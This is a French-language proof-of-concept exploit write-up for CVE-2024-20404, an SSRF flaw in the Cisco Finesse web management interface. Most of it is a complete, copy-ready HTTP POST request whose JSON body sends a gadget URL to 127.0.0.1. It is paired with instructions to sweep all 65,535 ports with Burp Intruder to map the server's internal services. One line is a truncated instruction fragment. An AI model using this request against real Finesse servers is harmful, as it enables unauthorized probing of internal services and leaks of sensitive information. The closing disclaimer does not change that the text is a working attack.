
Exploit de preuve de concept pour CVE-2024-20404 démontrant SSRF dans l'interface de gestion web Cisco Finesse pour énumérer les services locaux en envoyant des requêtes HTTP spécialement conçues.
Une vulnérabilité dans l'interface de gestion web de Cisco Finesse pourrait permettre à un attaquant distant non authentifié de mener une attaque SSRF sur un système affecté.
Cette vulnérabilité est due à une validation insuffisante des entrées fournies par l'utilisateur pour des requêtes HTTP spécifiques envoyées à un système affecté. Un attaquant pourrait exploiter cette vulnérabilité en envoyant une requête HTTP conçue à l'appareil affecté. Une exploitation réussie pourrait permettre à l'attaquant d'obtenir des informations sensibles limitées pour les services associés à l'appareil affecté.
<target> par la vôtre.POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}

Utilisez l'intruder de Burp Suite pour scanner tous les ports ouverts sur le serveur de gestion web Cisco Finesse, en modifiant le numéro de port de 1 à 65535.
Vous verrez la réponse « Connection refused » sur les ports fermés.


Ceci n'est qu'une preuve de concept (PoC) visant à démontrer que l'interface de gestion web de Cisco Finesse est vulnérable à la falsification de requête côté serveur (SSRF), et cette PoC est fournie à des fins éducatives uniquement. Utilisez-la de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de test. Une utilisation abusive de cette PoC peut entraîner de graves conséquences.